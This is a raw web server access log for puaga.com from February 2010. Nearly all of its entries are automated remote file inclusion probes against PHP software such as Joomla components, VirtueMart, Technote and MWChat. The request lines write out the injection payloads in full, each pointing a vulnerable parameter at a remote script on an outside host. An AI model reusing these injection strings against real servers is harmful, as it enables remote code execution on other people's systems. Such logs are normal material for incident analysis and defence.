80.172.236.41 - - [11/Feb/2010:06:37:44 -0800] "GET /logs/access_100128.log%20%20//admin/classes/errors.php?error=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:37:48 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:37:48 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:37:49 -0800] "GET /logs/access_100123.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:38:14 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:06:38:17 -0800] "GET /logs/access_100112.log//index.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:06:38:17 -0800] "GET /logs/access_100103.log//index.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [11/Feb/2010:06:38:36 -0800] "GET /logs/access_100114.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:06:38:36 -0800] "GET /logs/access_100114.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [11/Feb/2010:06:38:37 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [11/Feb/2010:06:38:37 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:38:55 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:38:55 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:38:58 -0800] "GET /logs/access_100114.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [11/Feb/2010:06:39:09 -0800] "GET /logs/access_100201.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.61.244.6 - - [11/Feb/2010:06:39:25 -0800] "GET /logs/access_100110.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
209.61.244.6 - - [11/Feb/2010:06:39:25 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
209.61.244.6 - - [11/Feb/2010:06:39:25 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:39:30 -0800] "GET /logs/access_100105.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:39:35 -0800] "GET /logs/access_100114.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:39:35 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:40:23 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXTBLIB_DIRD=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:40:23 -0800] "GET /logs/access_100109.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXTBLIB_DIRD=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:40:26 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXTBLIB_DIRD=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:06:40:35 -0800] "GET /logs/access_100114.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:40:55 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:06:40:56 -0800] "GET /logs/access_100110.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXTBLIB_DIRD=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:06:41:05 -0800] "GET /delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:06:41:05 -0800] "GET /logs/access_100120.log%20%20//delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:06:41:05 -0800] "GET /logs//delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:41:16 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:41:21 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:06:41:39 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:06:41:39 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:06:41:39 -0800] "GET /logs/access_100119.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:06:41:43 -0800] "GET /logs//delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:06:41:43 -0800] "GET /delete_all.php?board_skin_path=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:41:53 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:06:42:04 -0800] "GET /logs/access_100112.log//index.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:06:42:04 -0800] "GET /logs/access_100103.log//index.php?DOCUMENT_ROOT=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:06:42:07 -0800] "GET /logs//admin/classes/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:06:42:07 -0800] "GET /admin/classes/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:06:42:07 -0800] "GET /logs/access_100107.log%20%20//admin/classes/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:06:42:09 -0800] "GET /logs/access_100128.log%20%20//admin/classes/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [11/Feb/2010:06:42:35 -0800] "GET /logs/access_100122.log%20%20///bbs/delete_all.php?board_skin_path=http://www.clubedasmotocas.com.br/loja/suporte/data/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [11/Feb/2010:06:42:35 -0800] "GET //bbs/delete_all.php?board_skin_path=http://www.clubedasmotocas.com.br/loja/suporte/data/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [11/Feb/2010:06:42:35 -0800] "GET /logs///bbs/delete_all.php?board_skin_path=http://www.clubedasmotocas.com.br/loja/suporte/data/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [11/Feb/2010:06:42:35 -0800] "GET /logs/access_100203.log%20%20///bbs/delete_all.php?board_skin_path=http://www.clubedasmotocas.com.br/loja/suporte/data/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [11/Feb/2010:06:43:00 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [11/Feb/2010:06:43:03 -0800] "GET /logs/access_100114.log///?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [11/Feb/2010:06:43:03 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [11/Feb/2010:06:43:04 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [11/Feb/2010:06:43:15 -0800] "GET /logs/access_100114.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [11/Feb/2010:06:43:15 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:06:43:21 -0800] "GET /admin/classes/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:06:43:21 -0800] "GET /logs/access_100107.log//admin/classes/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:06:43:21 -0800] "GET /logs//admin/classes/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [11/Feb/2010:06:43:32 -0800] "GET /logs/access_100201.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.228.45.47 - - [11/Feb/2010:06:43:40 -0800] "GET /logs/access_100201.log///?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:06:43:43 -0800] "GET /logs/access_100128.log//admin/classes/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.61.244.6 - - [11/Feb/2010:06:44:54 -0800] "GET /logs/access_100111.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:06:45:12 -0800] "GET /logs/access_100107.log//admin/classes/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:06:45:12 -0800] "GET /admin/classes/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:06:45:12 -0800] "GET /logs//admin/classes/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:06:45:28 -0800] "GET /logs/access_100124.log/appserv/mani.php?appserv_root=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:06:45:32 -0800] "GET /logs/access_100112.log/appserv/mani.php?appserv_root=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:06:45:55 -0800] "GET /logs/access_100124.log/appserv/mani.php?appserv_root=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [11/Feb/2010:06:45:57 -0800] "GET /logs/access_100122.log//admin/classes/errors.php?error=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:06:45:59 -0800] "GET /logs/access_100112.log/appserv/mani.php?appserv_root=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:46:20 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:06:46:23 -0800] "GET /logs/access_100128.log/appserv/mani.php?appserv_root=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [11/Feb/2010:06:46:39 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:06:46:40 -0800] "GET /orange_g/forum/viewtopic.php?p=28100 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
74.205.120.218 - - [11/Feb/2010:06:46:50 -0800] "GET /logs//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.snipeground.com/administrator/components/com_virtuemart/classes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:06:46:50 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.snipeground.com/administrator/components/com_virtuemart/classes/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:06:46:51 -0800] "GET /index.php?option=com_bayesiannaivefilter&mosConfig_absolute_path=http://www.snipeground.com/administrator/components/com_virtuemart/classes/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:46:58 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:46:58 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:46:58 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:46:59 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.35.219.220 - - [11/Feb/2010:06:47:05 -0800] "GET /logs/access_100128.log/appserv/mani.php?appserv_root=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:47:06 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:06:47:11 -0800] "GET /logs/access_100114.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:47:12 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:47:12 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:47:16 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:47:17 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:47:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:47:23 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:47:23 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:47:38 -0800] "GET /logs/access_100128.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:06:48:15 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:06:48:15 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:06:48:18 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:06:48:18 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:06:48:22 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:48:23 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:48:23 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:48:23 -0800] "GET /logs/access_100118.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:06:48:24 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:48:30 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:06:48:38 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:06:48:38 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:06:48:51 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:06:48:51 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:06:48:51 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:06:48:59 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [11/Feb/2010:06:49:12 -0800] "GET /logs/access_100203.log///bbs/delete_all.php?board_skin_path=http://www.clubedasmotocas.com.br/loja/suporte/data/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:06:49:15 -0800] "GET ///skin/zero_vote/ask_password.php?dir=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:06:49:15 -0800] "GET /logs/access_100118.log%20%20////skin/zero_vote/ask_password.php?dir=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:06:49:15 -0800] "GET /logs////skin/zero_vote/ask_password.php?dir=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:49:20 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [11/Feb/2010:06:49:20 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
